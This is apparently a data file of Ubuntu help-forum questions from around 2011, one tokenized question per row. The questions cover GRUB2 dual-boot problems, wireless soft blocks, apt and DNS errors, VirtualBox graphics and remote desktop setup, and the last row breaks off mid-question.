62691	how can i move a boot partition onto a flash drive ?	i have installed ubuntu 11.04 server onto an acer aspire easystore h340-m . it was a windows home server . the hardware has an integral flash drive / usb ( scsi11 ) of 256 mb . could i use this as the boot partition ? if so any pointers on what i should do ?
62695	drawing and simulating digital circuits	drawing digital circuits can become a mess very fast which makes testing those even more difficult . doing it offline is a painful job with all those wires . so , what gui software is recommended for building digital circuits and testing them ?
62699	create a random playlist of all music	i want to listen to all my music streaming to my android phone . how do i create a random playlist with all my music ( nearly 14 gb worth of tracks ) and then play that one the phone ? do i have to use my ubuntu laptop to do this and transfer over to the phone , or can the android app do this ?
62700	update manager fails to check for updates	the update manager is giving me a problem . each time i hit the check for updates button , i get the following error : w : failed to fetch http : //ppa.launchpad.net/weather-indicator-team/pp/ubuntu/dists/natty/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/weather-indicator-team/pp/ubuntu/dists/natty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i re-install the update manager and then it works properly , the same issue was with the software center i did the same and it worked . any help ?
62706	is there an ubuntu one files iphone client ?	is it possible to access files in my account ubuntu one via iphone ?
62709	does installing ubuntu affect the files in my windows installation ?	i 'm looking to install ubuntu 11.04 and i 've been reading through the sites instructions but i am still wondering that if i were to install it would it keep all of my original files from my windows 7 os ? or would i have to reinstall and re-add my old documents once installing ubuntu ?
62711	which software ( dawâ´s , audio editors , etc . ) should be installed in ubuntu studio to work with videogame music and sounds ?	i make music and sounds for video games . which software should i install on ubuntu studio for this purpose ?
62713	how to downgrade user permissions on a java app after opening port 80/443	i 'm a java developer writing a web app ( jetty server ) . are there any guides out there are how i might downgrade user permissions using java ? most native linux apps will start as root , open root-only ports like 80/443 , then downgrade themselves to a non root user ( through a process which i 'm not familiar with ) . i 'd like to be able to do the same in a java environment .
62715	server auto-installed decnet during dist-upgrade	when i did a dist-upgrade of my ubuntu 10.04 server , it automatically installed decnet , and it trew up ncurses based configuration wizard . i have never heard of decnet , but i followed the instructions in the wizard , and accepted for it to be installed , and it lead to the disconnection of 2 of my internet uplinks , and the hosted website stopped responding on wan side . then i purged decnet , and rebooted the server , and everything went normal . so why did my server install decnet when i did dist-upgrade ?
62719	can i choose between gnome shell and unity on login ?	after installing the gnome-shell package , will i have option to switch between unity 3d and gnome-shell at the time of logging in ( just like we have choice for unity 3d and 2d ) ?
62721	3d support for virtualbox/vmwareplayer guests ?	i have been using virtualbox vms under ubuntu for some time now , and , with the guest additions properly installed , the vms always had 3d support - at least enough to run unity in natty . but , when i 've upgraded to a new machine ( dell precision e4600 ) it no longer works . : ( the old machine ( dell latitude d630 ) has intel graphics , i think , and the new has ati graphics , so that 's probably the issue . i 'm not sure how to find out what model exactly . the host os , ubuntu 11.04 , does have working 3d . that is to say , i can run unity fine , glxgears works , and foldit also . somehow it just seems to be insufficient for both virtualbox and vmware player . i did initially try to install the ati proprietary drivers ( through the additional drivers tool ) . they did permit 3d to run in the vms , but they also caused lots of trouble with multiple monitor support , so i uninstalled them . have i somehow broken the default driver when i installed the ati drivers , or does it just not support my hardware well enough for vms ? might the situation be improved in 11.10 ?
62725	which installation process should i choose on the virtual machine ?	this is what i have done so far : downloaded the iso for ubuntu downloaded and installed oracle vm virtualbox set up my virtual machine in virtualbox mounted the ubuntu iso in my virtual machine started ubuntu successfully for the first time reached the setup/install for ubuntu anyways , i 'm at this page : http : //i.imgur.com/mufxf.png so , as you can see , i 'm at the install menu and there 's two options : try ubuntu and install ubuntu . i want to fully install ubuntu to my virtual machine . however , i only want it on my virtual machine . when i click `` install ubuntu '' it says `` erase disk and install ubuntu warning this will delete any files on the disk . '' what disk is that message referring to ? i want to install ubuntu so its only on my virtual machine , i do n't want it to mess up windows ( which is what my real machine is running ) nor do i want it to mess with my files on my real machine . so , what do i do to install ubuntu solely to my virtual machine ?
62728	how can i install vcrun2008 using winetricks ?	i tried to install vcrun2008 but i always get vcrun2008 install completed , but installed file /home/bla/.wine/dosdevices/c : /windows/winsxs/x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.6161_x-ww_028bc148/mfc90.dll not found i installed winetricks from the ubuntu software center , then i read about manual install and installed it manually into my home directory . but the manual install is not active when i uninstall the ubuntu software center version . how can i install the latest version from ubuntu software center ? or how can i install vcrun2008 with the usc ?
62729	how do i set up a service ?	i have a script that i would like to run as a service on my ubuntu server 11.04 headless box . that is , i want to have the correct files under /etc/init.d/ and to be able to control it via the service command . is there any guide available that will show me how to do this ?
62730	can not change soft block setting to `` no '' for ar9287 wireless network	my wireless works , but i have to right click the network manager applet and enable wireless on every boot which is annoying . this is the output of rfkill normally : x @ triela : ~ $ rfkill list 0 : acer-wireless : wireless lan soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no when i rfkill block 0 ; rfkill block 1 this is what i get : x @ triela : ~ $ rfkill list 0 : acer-wireless : wireless lan soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : yes hard blocked : yes 2 : hci0 : bluetooth soft blocked : no hard blocked : no when i rfkill unblock all , it clears all but the soft block on 0 . my wireless is switched on/off by fn + f3 . the indicator light for it is lit when connected , and blinks when there is activity , but it does not show me the on/off state . i have tried everything i could find on the internet , but nothing has worked to unblock it or keep wireless enabled . this is the output of my wifi card from lspci -v : 06:00.0 network controller : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : foxconn international , inc. device e034 flags : bus master , fast devsel , latency 0 , irq 17 memory at d0200000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : kernel driver in use : ath9k kernel modules : ath9k
62731	booting ubuntu with grub2 : how to add boot entry to grub2 ?	last night , i decided to take the plunge , and install ubuntu as complimentary part to my dual boot system ( with windows 7 ) . unfortunately , the entire process has been a struggle uphill , namely with getting the bootloader configured properly . a short historical synopsis , for the full context of the situation : generated and installed ubuntu 11.04 x64 off of a usb drive setup on a windows 7 machine . i had trouble getting the installer to even boot , until i learned i could n't use my usb3.0 port . switched to the usb2.0 port , continued with the install . i have a 1tb hdd that i split in half for the purpose of dual booting : 500gb partition for windows 7 , and a 500gb for ubuntu ( excluding the boot/swap file partitions ) . the ubuntu partition was installed with the ext4 filesystem , and installation completed without any apparent problems , and was prompted to reboot . upon rebooting , i got dumped into the old windows boot loader , which immediately fired up windows . i played around with a utility called easybcd to attempt to add a linux entry to my newly installed partition , to no avail . then , i booted ubuntu straight off the usb drive , and installed grub2 onto the boot partition following the steps outlined here . i also ran the step ( `` update-grub '' ) to generate a new 'grub.cfg ' file , which added an entry to my old 'windows 7 ' bootloader , but not one for my new ubuntu partition ! when i rebooted , the grub2 bootloader started successfully , but my ubuntu was still unable to be found/booted under the list of available operating systems . anyone have any ideas how i should change/update this configuration such that it 'll point to my new ubuntu installation properly ? some useful information ... '' fdisk -l '' : disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb209a592 device boot start end blocks id system /dev/sdd1 * 1 13 102400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sdd2 13 60555 486297600 7 hpfs/ntfs /dev/sdd3 60555 120143 478642176 83 linux /dev/sdd4 120143 121602 11717633 5 extended /dev/sdd5 120143 121602 11717632 82 linux swap / solaris '' grub.cfg '' entries : # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sdd1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( /dev/sdd , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 08bab5b0bab59b20 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # '' boot_info_script output : boot info script 0.60 from 17 may 2011 ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > windows is installed in the mbr of /dev/sdb . = > windows is installed in the mbr of /dev/sdc . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdd and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos1 ) /grub on this drive . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sde . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows xp boot sector info : no errors found in the boot parameter block . operating system : boot files : sdb1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sdb2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sdc1 : __________________________________________________________________________ file system : ntfs boot sector type : windows xp boot sector info : no errors found in the boot parameter block . operating system : boot files : sdd1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files : /grub/grub.cfg /bootmgr /boot/bcd /grub/core.img sdd2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sdd3 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 11.04 boot files : /boot/grub/grub.cfg /etc/fstab sdd4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sdd5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sde1 : __________________________________________________________________________ file system : vfat boot sector type : syslinux 4.04 2011-04-18 boot sector info : syslinux looks at sector 8448 of /dev/sde1 for its second stage . syslinux is installed in the directory . the integrity check of the adv area failed . no errors found in the boot parameter block . operating system : boot files : /boot/grub/grub.cfg /syslinux/syslinux.cfg /ldlinux.sys ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 63 1,953,520,064 1,953,520,002 7 ntfs / exfat / hpfs drive : sdb _____________________________________________________________________ disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sdb2 * 206,848 488,394,751 488,187,904 7 ntfs / exfat / hpfs drive : sdc _____________________________________________________________________ disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 63 1,953,520,064 1,953,520,002 7 ntfs / exfat / hpfs drive : sdd _____________________________________________________________________ disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdd1 * 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sdd2 206,848 972,802,047 972,595,200 7 ntfs / exfat / hpfs /dev/sdd3 972,802,048 1,930,086,399 957,284,352 83 linux /dev/sdd4 1,930,088,446 1,953,523,711 23,435,266 5 extended /dev/sdd5 1,930,088,448 1,953,523,711 23,435,264 82 linux swap / solaris drive : sde _____________________________________________________________________ disk /dev/sde : 3926 mb , 3926949888 bytes 16 heads , 16 sectors/track , 29960 cylinders , total 7669824 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sde1 * 8,064 7,669,823 7,661,760 c w95 fat32 ( lba ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 36ba3c8cba3c4a9f ntfs data storage ( backup ) /dev/sdb1 90a09285a0927188 ntfs system reserved /dev/sdb2 88e09c67e09c5d6e ntfs old os hdd /dev/sdc1 1cee7227ee71f8fa ntfs data storage /dev/sdd1 08bab5b0bab59b20 ntfs system reserved /dev/sdd2 30eec43aeec3f65e ntfs operating system /dev/sdd3 fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa ext4 /dev/sdd5 086c0085-650b-495f-b9e8-e7e637fac705 swap /dev/sde1 fc8f-97fe vfat pendrive ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sde1 /cdrom vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) ============================= sdd1/grub/grub.cfg : ============================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( /dev/sdd , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 43000377-e88b-4373-975e-66146de829ce if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ntfs set root= ' ( /dev/sdd , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 08bab5b0bab59b20 set locale_dir= ( $ root ) /grub/locale set lang=en_us insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # menuentry `` windows 7 ( loader ) ( on /dev/sdb1 ) '' -- class windows -- class os { # insmod part_msdos # insmod ntfs # set root= ' ( /dev/sdb , msdos1 ) ' # search -- no-floppy -- fs-uuid -- set=root 90a09285a0927188 # chainloader +1 # } menuentry `` windows 7 ( loader ) ( on /dev/sdd1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( /dev/sdd , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 08bab5b0bab59b20 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdd1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ? ? = ? ? grub/core.img 1 ? ? = ? ? grub/grub.cfg 1 =========================== sdd3/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod efi_gop insmod efi_uga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( /dev/sdd , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( /dev/sdd , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 2.6.38-8-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sdd , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa linux /boot/vmlinuz-2.6.38-8-generic root=uuid=fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.38-8-generic } menuentry 'ubuntu , with linux 2.6.38-8-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sdd , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa echo 'loading linux 2.6.38-8-generic ... ' linux /boot/vmlinuz-2.6.38-8-generic root=uuid=fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.38-8-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sdd , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sdd , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sdb1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( /dev/sdb , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 90a09285a0927188 chainloader +1 } menuentry `` windows 7 ( loader ) ( on /dev/sdd1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( /dev/sdd , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 08bab5b0bab59b20 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sdd3/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdd3 during installation uuid=fb62baf1-e6a7-4e0d-ada2-2efb52ab12fa / ext4 errors=remount-ro 0 1 # swap was on /dev/sdd5 during installation uuid=086c0085-650b-495f-b9e8-e7e637fac705 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sdd3 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) 476.025924683 = 511.128944640 boot/grub/grub.cfg 1 465.547851562 = 499.878199296 boot/initrd.img-2.6.38-8-generic 2 686.000980377 = 736.587943936 boot/vmlinuz-2.6.38-8-generic 1 465.547851562 = 499.878199296 initrd.img 2 686.000980377 = 736.587943936 vmlinuz 1 =========================== sde1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` try ubuntu without installing '' { set gfxpayload=keep linux /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu '' { set gfxpayload=keep linux /casper/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` check disc for defects '' { set gfxpayload=keep linux /casper/vmlinuz boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz } -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ========================= sde1/syslinux/syslinux.cfg : ========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # d-i config version 2.0 include menu.cfg default vesamenu.c32 prompt 0 timeout 50 # if you would like to use the new menu and be presented with the option to install or run from usb at startup , remove # from the following line . this line was commented out ( by request of many ) to allow the old menu to be presented and to enable booting straight into the live environment ! # ui gfxboot bootlogo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sde1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ? ? = ? ? boot/grub/grub.cfg 1 ================= sde1 : location of files loaded by syslinux : ================== gib - gb file fragment ( s ) ? ? = ? ? ldlinux.sys 1 ? ? = ? ? syslinux/gfxboot.c32 1 ? ? = ? ? syslinux/syslinux.cfg 1 ? ? = ? ? syslinux/vesamenu.c32 1 ============== sde1 : version of com32 ( r ) files used by syslinux : =============== syslinux/gfxboot.c32 : com32r module ( v4.xx ) syslinux/vesamenu.c32 : com32r module ( v4.xx ) =============================== stderr messages : =============================== unlzma : decoder error /home/ubuntu/desktop/boot_info_script.sh : line 1579 : [ : 2.73495e+09 : integer expression expected
62734	vnc with windows 7	i want remote desktop access to a windows 7 home premium machine , but home premium does not have rdp server support . what are my options to set up a vnc server on windows for best remote desktop experience from ubuntu ?
62736	automatically mark files and directories tracked by git in nautilus	when you use git for a lot of projects it can sometimes be hard to remember which projects you use git for and which you do n't . it 's important to know this so that you commit changes if you make changes to projects tracked by git . is there a way to automatically mark files and directories tracked by git so that they show in nautilus , e.g . by marking them with emblems ?
62738	how can i host a website in a virtual machine ?	before you shoot this down , please let me explain what i mean ... . i am running windows , i also have a virtual machine installed that is running ubuntu . i want to set up a website on ubuntu ( the virtual machine ) that is either only accessible to my windows physical machine or only accessible to other computers on my private network/lan . so , how would i set this up ? how do i host a `` private '' website on ubuntu ? this video sort of demonstrates what i 'm after , when he does the slowloris demonstration , he 's running the webserver on windows and then attacking through linux virtual machine . how do i do that , except reversed ? http : //vimeo.com/7618090
62746	timeout errors in apt-get update/install	i 'm trying to do an apt-get update or apt-get install xyz and i 'm seeing timeouts like this : w : failed to fetch http : //eu-west-1.ec2.archive.ubuntu.com/ubuntu/dists/oneiric-updates/release.gpg unable to connect to eu-west-1.ec2.archive.ubuntu.com : http : [ ip : 10.224.87.159 80 ] is this a transient issue with ubuntu , or maybe it 's something on my end . the box i 'm accessing it from is in ec2-eu . perhaps there is a way to force the installer to use the us servers which seem to work ?
62748	get desktop configuration file to run 2 programs when clicked	how do i get a desktop configuration file to start two programs when clicked , with one of the programs being a terminal program ? here is what i have so far : google doc this link will let you edit the file if there 's anything that needs to be changed to make it work . irssi is the terminal program . i think you all know what firefox is . now i ca n't get the irssi command in the twit live ! chat shortcut to work .
62750	automatically select a different keyboard layout for a yubikey	i just got a new yubikey authentication token . theoretically it works great with linux as it presents itself to the system as a usb keyboard . however , my default keyboard layout is german neo , which is radically different from a standard english keyboard . so the passphrase ends up being completely garbage . is it possible to automatically have a different keyboard layout applied to the input coming from the yubikey ( the yubikey identifies itself as id 1050:0010 yubico.com yubikey with lsusb so i suppose detection should be possible ) .
62753	a driver depends on opengl , what package provides it ?	my device software dependencies are : dkms opengl gcc glibc kernel-headers . but when i install opengl it fail . what i have to use in 10.04 and 11.04 ( i have both installed side by side for learning ) follow up : step 1 : dkms/gcc/glibc # apt-get install dkms # apt-get install build-essential step 2 : kernel-headers # apt-cache search linux-headers- $ ( uname -r ) > linux-headers-2.6.32-33-generic - linux kernel headers for version 2.6.32 on x86/x86_64 # apt-get install linux-headers-2.6.32-33-generic step 3 : opengl # apt-get install opengl reading package lists ... done building dependency tree reading state information ... done e : could n't find package opengl -- - see answer -- - verify # glxinfo | grep `` opengl version '' opengl version string : 2.1 mesa 7.7.1 done .
62754	connection to dns fails after few successful connections	i connect to the internet with a static ip . connection is fine . after few successful connections to the dns , the dns becomes unreachable ( ping still works using ip addresses ) . restarting the ethernet connection solves the problem for few dns queries before it stops again . does anybody have an idea what could be the problem ? many thanks in advance for your kind help ! unsuccessful query : dig google.com ; < < > > dig 9.7.3 < < > > google.com ; ; global options : +cmd ; ; connection timed out ; no servers could be reached information about my system : running ubuntu 11.04 ( with all updates ) . $ uname -r 2.6.38-11-generic $ i config ( i replaced the ip addresses for this post ) eth0 link encap : ethernet hwaddr e0:69:95:0e:99:22 inet addr : my.ip.address.here bcast : another.ip.address.here mask:255.255.0.0 inet6 addr : one : :more : :ip : :address scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:999950 errors:0 dropped:17458 overruns:0 frame:0 tx packets:14668 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:204167642 ( 204.1 mb ) tx bytes:2175973 ( 2.1 mb ) interrupt:20 memory : d1400000-d1420000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:192 errors:0 dropped:0 overruns:0 frame:0 tx packets:192 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:14736 ( 14.7 kb ) tx bytes:14736 ( 14.7 kb ) $ head /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 26 model name : intel ( r ) 